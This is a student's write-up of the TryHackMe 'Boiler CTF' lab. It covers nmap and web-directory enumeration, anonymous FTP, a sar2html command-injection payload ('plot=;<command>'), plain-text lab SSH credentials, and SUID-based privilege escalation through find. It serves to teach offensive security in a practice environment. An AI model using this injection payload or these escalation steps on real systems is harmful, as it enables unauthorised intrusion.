Cyber Security: An Offensive Mindset [Week 4

Page Title

Cyber Security: An Offensive Mindset [Week 4 - Boiler CTF Write up]

TryHackMe: Boiler CTF - Write Up

Initially my first task was enumeration on the target to learn and discover as much I can about the target. Which was a struggle due to the VPN access to the server not being very cooperative. However, I found some work arounds that I used to overcome what was thrown at me.

One issue was the nmap scans taking way too long, but after discussing with my facilitators Max and Larry they nudged me into the right direction to use the -T4 or -T5 flag when conducting nmap scans. The reasoning for this is if a scan on a port times out after 4 or 5 seconds it will move to the next port instead of waiting for a response for default of 10 seconds, this is a lot more efficient.

-T4 or -T5 = change the timeout before moving to next port for scanning.

Another issue that I faced when using nmap was the error message shown in the below screen shot that wouldn't let me run a scan unless I used the flag -Pn . So I incorporated this flag in all my future scans but this did leave me scratching my head for awhile because I've done nmap scans previously without this issue.

-Pn = Disable host discovery and just scan for open ports.

A scan that I found useful to uncover some quick useful information about the target was a fast scan using the -F flag, especially since I was waiting for a full port scan in the background it allowed me to start understanding what was in fact at play.

-F = fast port scan (100 ports).

The full scan that I waited for in the background was the most productive and uncovered a lot above the target. From open ports, the services running (versions) and even the operating system being used which was quite interesting.

p- = Scan all ports.
Pn = Disable host discovery and just scan for open ports.
T4 =
sV = Attempts to determine the version of the services running.
sC = Scan with the default nmap scripts.
o <FileName.Extension> = Output scan results into file

Question 1 [Round 1]

For this first round I was left really confused and stuck for along period until I took a step back and did some research about ftp. Then I finally understood that you are able to log onto an ftp service as an anonymous user which is what the reference to anon login was referring to.
So if we run ftp <IP> which may take a few attempts as connection errors do occur (I found this out the hard way), so don't be discouraged. I found this out by researching more about ftp.

The errors you get will look like this (type exit and retry):

Until you reach this (may take several attempts) and login using the name anonymous:

From here when we are using the ftp service if we use the command help it will tell us what commands are usable on the service as shown:

I found that -ls -la instead of normal ls actually showed a hidden file called .info.txt which means that the answer to round 1 is actually .txt because that is the only file extension that ASCII Or BINARY view can process as it must be raw.

Question 1 [Round 2]

This next round was quite easy if we observe my previous nmap scan as shown below we can see that ssh is running on the highest port 55007.

Question 1 [Round 3]

Again with this round it can easily be inspected from the nmap scan above that we did that on port 10000 the service webmin is running.

Question 1 [Round 4]

The next round involved some research on exploitation of whether this service can be taken advantage of for its flaws. I initially looked on exploit.db for the version of MiniServer 1.930 for any potential exploits without any luck. The same result occured when I served for webmin 1.930, there were also no results when I searched google either for this reason I stated nay.

Question 1 [Round 5]

Next cab off the ranks is round 5 which I found a bit odd I wasn't sure what CMS was so I did some research and found that it was a Content Management System. How to work out which type of CMS was in use by the web server. After a lot of struggling being pushed in the right direction by my facilitator Max, I decided that using gobuster to brute force the webserver to uncover any directories that may be interesting.

After doing so as seen below we notice /joomla which after researching further I found that it was in fact a CMS and this was the answer to this round.

Question 1 [Round 6]

After a lot of enumeration especially on the ftp server I discovered a hidden file as shown below by doing the command ls -la as seen below.

However, when I attempted vim or cat the file I wasn't able to to do so but after some research I discovered it needs a get <filename> - command to print contents to terminal.

So after doing the above I found the below contents, which I guessed was encrypted using ROT13 so I decided to utilise cyberchef (online tool) to unencrypt the message and sure enough it was a troll by the creator of this box Just wanted to see if you find it. Lol. Remember: Enumeration is the key!.

Question 1 [Round 7]

My instincts told me for this question we'd have to keep enumerating joomla service running on the web server to see if we can either exploit it or gain access to a users account. So I did some research and found a bruteforce tool called joomscan that might be of use so I gave it a go and it uncovered some basic information as shown:

After looking through the directories that this tool discovered I still hadn't made any progress as there weren't any interesting files in the administrator directories. So I continued researching to see if I could find any other ways to combat joomla, which is when I discovered DIRB:

The scan that I ran was dirb [http://10.10.201.165/joomla/](http://10.10.201.165/joomla/) and I was honesty pleasantly surprised some interesting directories were found by this tool inside of joomla as you can see below in the screenshot.

Within /_files/ and after decrypted the contents to times with base64 the output was Whopsie daisy so just another rabbit hole.

Within /_test/ was differently interesting, finding sar2html may mean there is a possible exploit that can be used to gain access to files. Sure enough as seen in screenshot below on exploit.db there actually is a current exploit for sar2html.

When I saw the exploit http://<IP>/index.php?plot=;<command here> I quick made a comparison to the currently url I was on in /_test which is:

After some experimentation I decided to change LINUX in the url to ;ls and sure enough as you can see in the below screen shot the contents of the current directory were shown. The interesting file and the answer to this round is log.txt.

Question 2 [Round 1]

Continuing where we left off from the previous round if we change the command that we executed from ;ls to ;cat log.txt we should be able to see if the contents of the log file can be of interest to us.

After discovering the user details in the above log.txt file I went into a terminal and typed the following command ssh basterd@10.10.219.146 -p 55007 and use the password suerduperp@$$ when prompted as shown:

Once I was logged in as user basterd I ran the command ls to see if there are any interesting files that can be found and what I found was a file called backup.sh.

Question 2 [Round 2]

From here I quickly used the cat command to see the contents of this file to see if maybe there was something suspicious inside. As seen below I found another users name and credentials which will allow me to ssh as that user.

The user that I will attempt to log in using ssh will be stoner and the password for this user is superduperp@$$no1knows.

After some poking around I was greeted with this message when I found .secret and used cat to see the contents.

This was very frustrating because I didn't understand that the answer was actually right there in front of me the entire time You made it till here, well done., the answer for round 2.

Question 2 [Round 3]

This next round was quite straight forward once I did some research and found the following command that enumerates all binaries having SUID permissions find / -perm -u=s -type f 2>/dev/null.

When the command is typed these are the results as shown below, I found it very interesting that this is actually accessible by any user.

After some extra research I uncovered that /usr/bin/find can actually be exploited to gain privileged user escalation as shown below:

I tried this for myself on the system that I am targeting and sure enough it actually worked, as you can see I got the exact same result. This meant that find was the correct answer to round 3.

Question 2 [Round 4]

After a lot of trial and error I tried to use the command I discovered in round 3 again but this time to show what is hidden in root. Essentially to find root.txt which this round 4 task requires, so I found myself attempting the following:

But after a lot of trial and error, I decided to try the same command but without the "double quotes" because it didn't seem to allow any command apart from whoami to run. Sure enough it worked, YABADABADOOOO!